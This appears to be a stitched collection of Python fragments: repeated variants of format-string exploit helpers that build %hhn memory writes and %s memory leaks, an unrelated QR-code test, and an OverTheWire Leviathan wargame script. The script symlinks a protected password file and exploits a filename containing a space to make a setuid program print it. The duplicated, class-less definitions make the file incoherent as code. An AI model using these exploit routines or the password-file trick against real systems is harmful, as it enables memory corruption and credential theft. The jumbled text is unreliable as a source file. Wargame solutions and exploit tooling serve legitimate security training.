def qrcode_check(self):
    """Round-trip a random string through ``qrencode`` and ``qrdecode``.

    A random text of 10-40 characters is turned into a QR code with
    ``self.translate('qrencode', ...)``, wrapped in a randomly chosen transport
    encoding (``b64`` or ``hex``) and handed to ``qrdecode``. Returns ``True``
    when the decoded text equals the original; otherwise the mismatch is
    recorded via ``self.check_fail`` and ``False`` is returned.
    """
    original = randoms(random.randint(10, 40))
    log.info('qrencode %s', original)
    qr = self.translate('qrencode', original)

    transport = random.choice(['b64', 'hex'])
    log.info('qrdecode (%s)', transport)
    decoded = self.translate('qrdecode', _encode(qr, transport), transport)

    if original == decoded:
        return True
    self.check_fail('%s not matched %s' % (original, decoded))
    return False
def execute_writes(self):
    """execute_writes() -> None

    Turn every pending write in ``self.writes`` into one format-string
    payload, send it through ``self.execute_fmt`` and clear the queue.

    The payload starts with ``self.padlen`` random ASCII letters (as bytes);
    that prefix length is reported to ``fmtstr_payload`` via ``numbwritten``
    and the writes are emitted byte-sized.

    Returns:
        None
    """
    padding = randoms(self.padlen, string.ascii_letters.encode("utf8"))
    payload = fmtstr_payload(
        self.offset,
        self.writes,
        numbwritten=self.padlen,
        write_size="byte",
    )
    self.execute_fmt(padding + payload)
    self.writes = {}
def execute_writes(self):
    """execute_writes() -> None

    Turn every pending write in ``self.writes`` into one format-string
    payload, send it through ``self.execute_fmt`` and clear the queue.

    The payload starts with ``self.padlen`` random characters; that prefix
    length is reported to ``fmtstr_payload`` via ``numbwritten`` and the
    writes are emitted byte-sized.

    Returns:
        None
    """
    padding = randoms(self.padlen)
    payload = fmtstr_payload(
        self.offset,
        self.writes,
        numbwritten=self.padlen,
        write_size='byte',
    )
    self.execute_fmt(padding + payload)
    self.writes = {}
def execute_writes(self):
    """execute_writes() -> None

    Turn every pending write in ``self.writes`` into one format-string
    payload, send it through ``self.execute_fmt`` and clear the queue.

    The payload starts with ``self.padlen`` random characters (encoded to
    bytes). ``fmtstr_payload`` is told how many characters precede its
    directives: that prefix plus ``self.numbwritten``. Writes are emitted
    byte-sized.

    Returns:
        None
    """
    padding = randoms(self.padlen).encode()
    already_written = self.padlen + self.numbwritten
    payload = fmtstr_payload(
        self.offset,
        self.writes,
        numbwritten=already_written,
        write_size='byte',
    )
    self.execute_fmt(padding + payload)
    self.writes = {}
def _leaker(self, addr):
    """Leak the bytes at ``addr`` through a ``%s`` format-string read.

    Hack: ELF headers often start at offset 0 in a page, but addresses that
    contain a null byte usually cannot be leaked and the page below the
    header is often unmapped. So when ``addr`` is page-aligned and the three
    bytes right after it read "ELF", this returns "\\x7f" without asking the
    target, unless that byte is leaked some other way.

    The leaked data is whatever appears between the START/END markers in the
    target's output, with a trailing NUL appended (presumably the terminator
    that stopped the ``%s`` read).
    """
    page_aligned = (addr & 0xfff) == 0
    if page_aligned and self.leaker._leak(addr + 1, 3, False) == "ELF":
        return "\x7f"

    marker_fmt = "START%%%d$sEND" % self.offset
    payload = randoms(self.padlen) + pack(addr) + marker_fmt
    response = self.execute_fmt(payload)

    # First START...END span in the output; raises IndexError when absent.
    matches = re.findall(r"START(.*)END", response, re.MULTILINE | re.DOTALL)
    return matches[0] + "\x00"
def _leaker(self, addr):
    """Leak the bytes at ``addr`` through a ``%s`` format-string read.

    Hack: ELF headers often start at offset 0 in a page, but addresses that
    contain a null byte usually cannot be leaked and the page below the
    header is often unmapped. So when ``addr`` is page-aligned and the three
    bytes right after it read b"ELF", this returns b"\\x7f" without asking
    the target, unless that byte is leaked some other way.

    The leaked data is whatever appears between the START/END markers in the
    target's output, with a trailing NUL appended (presumably the terminator
    that stopped the ``%s`` read).
    """
    page_aligned = (addr & 0xfff) == 0
    if page_aligned and self.leaker._leak(addr + 1, 3, False) == b"ELF":
        return b"\x7f"

    marker_fmt = b"START%%%d$sEND" % self.offset
    payload = randoms(self.padlen).encode() + pack(addr) + marker_fmt
    response = self.execute_fmt(payload)

    # First START...END span in the output; raises IndexError when absent.
    matches = re.findall(br"START(.*)END", response, re.MULTILINE | re.DOTALL)
    return matches[0] + b"\x00"
def _leaker(self, addr):
    """Leak the bytes at ``addr`` through a ``%s`` format-string read.

    Hack: ELF headers often start at offset 0 in a page, but addresses that
    contain a null byte usually cannot be leaked and the page below the
    header is often unmapped. So when ``addr`` is page-aligned and the three
    bytes right after it read b"ELF", this returns b"\\x7f" without asking
    the target, unless that byte is leaked some other way.

    The leaked data is whatever appears between the START/END markers in the
    target's output, with a trailing NUL appended (presumably the terminator
    that stopped the ``%s`` read).
    """
    page_aligned = (addr & 0xFFF) == 0
    if page_aligned and self.leaker._leak(addr + 1, 3, False) == b"ELF":
        return b"\x7f"

    padding = randoms(self.padlen, string.ascii_letters.encode("utf8"))
    marker_fmt = "START%{}$sEND".format(self.offset).encode("utf8")
    payload = b"".join((padding, pack(addr), marker_fmt))
    response = self.execute_fmt(payload)

    # First START...END span in the output; raises IndexError when absent.
    matches = re.findall(b"START(.*)END", response, re.MULTILINE | re.DOTALL)
    return matches[0] + b"\x00"
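def execute_writes(self):
    """Flush every queued write in ``self.writes`` through one format string.

    Each ``(addr, data)`` pair is expanded into single-byte writes: the target
    addresses are packed at the start of the payload (after ``self.padlen``
    random padding characters) and each byte is written with a
    ``%<width>c%<index>$hhn`` pair, where ``<width>`` advances the running
    character count so that the low byte of the count equals the wanted value.
    The queue is emptied afterwards.

    Returns:
        None
    """
    target_addrs = []
    # Renamed from ``bytes`` so the builtin is not shadowed.
    target_bytes = []
    # Convert every write into single-byte writes so each one can be done
    # with a 1-byte %hhn directive.
    for addr, data in self.writes:
        data = flat(data)
        for off, b in enumerate(data):
            target_addrs.append(addr + off)
            target_bytes.append(u8(b))

    fmtstr = randoms(self.padlen) + flat(target_addrs)
    # Running count of characters printf will have emitted: whatever
    # ``self.numbwritten`` accounts for plus the payload prefix built so far.
    n = self.numbwritten + len(fmtstr)
    for i, value in enumerate(target_bytes):
        # Extra characters needed so (n + value) % 256 equals the wanted
        # byte; keep the %c width strictly positive by wrapping by 256.
        value -= (n % 256)
        if value <= 0:
            value += 256
        fmtstr += "%%%dc%%%d$hhn" % (value, self.offset + i)
        n += value

    self.execute_fmt(fmtstr)
    self.writes = []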
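def execute_writes(self):
    """Flush every queued write in ``self.writes`` through one format string.

    Each ``(addr, data)`` pair is expanded into single-byte writes: the target
    addresses are packed at the start of the payload (after ``self.padlen``
    random padding characters) and each byte is written with a
    ``%<width>c%<index>$hhn`` pair, where ``<width>`` advances the running
    character count so that the low byte of the count equals the wanted value.
    The queue is emptied afterwards.

    Returns:
        None
    """
    target_addrs = []
    # Renamed from ``bytes`` so the builtin is not shadowed.
    target_bytes = []
    # Convert every write into single-byte writes so each one can be done
    # with a 1-byte %hhn directive.
    for addr, data in self.writes:
        data = flat(data)
        for off, b in enumerate(data):
            target_addrs.append(addr + off)
            target_bytes.append(u8(b))

    fmtstr = randoms(self.padlen) + flat(target_addrs)
    # Running count of characters printf will have emitted: whatever
    # ``self.numbwritten`` accounts for plus the payload prefix built so far.
    n = self.numbwritten + len(fmtstr)
    for i, value in enumerate(target_bytes):
        # Extra characters needed so (n + value) % 256 equals the wanted
        # byte; keep the %c width strictly positive by wrapping by 256.
        value -= (n % 256)
        if value <= 0:
            value += 256
        fmtstr += "%%%dc%%%d$hhn" % (value, self.offset + i)
        n += value

    self.execute_fmt(fmtstr)
    self.writes = []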
from pwn import *
from pygments import highlight
from pygments.lexers import CLexer
from pygments.formatters import TerminalFormatter
from pwnlib.util.fiddling import randoms
from time import sleep

# Target level and SSH credentials (the user/password literals appear
# redacted in this copy of the script).
level = 2
user = '******' % level
host = 'leviathan.labs.overthewire.org'
password = '******'
port = 2223


def connectToLevel():
    """Open an SSH session to the wargame host using the module-level credentials."""
    return ssh(user=user, host=host, port=port, password=password)


context(arch='i386', os='linux')

# Base folder for unpack
UNPACK_FOLDER = '/tmp/%s' % randoms(10)

# Keep the SSH session object alive and spawn a shell with an empty PS1, so no
# prompt text is mixed into what we read back.
session = connectToLevel()
sh = session.process('/bin/sh', env={'PS1': ''})

# Work inside the scratch directory, link the level-3 password file there,
# create a second file whose name contains a space, and run printfile on that
# name with stderr discarded.
commands = [
    'mkdir -p %s' % UNPACK_FOLDER,
    'cd %s' % UNPACK_FOLDER,
    'ln -s /etc/leviathan_pass/leviathan3 leviathan3',
    'touch "tmp leviathan3"',
    '/home/leviathan2/printfile "tmp leviathan3" 2>/dev/null',
]
for command in commands:
    sh.sendline(command)

log.info('Flag = %s' % sh.recvline())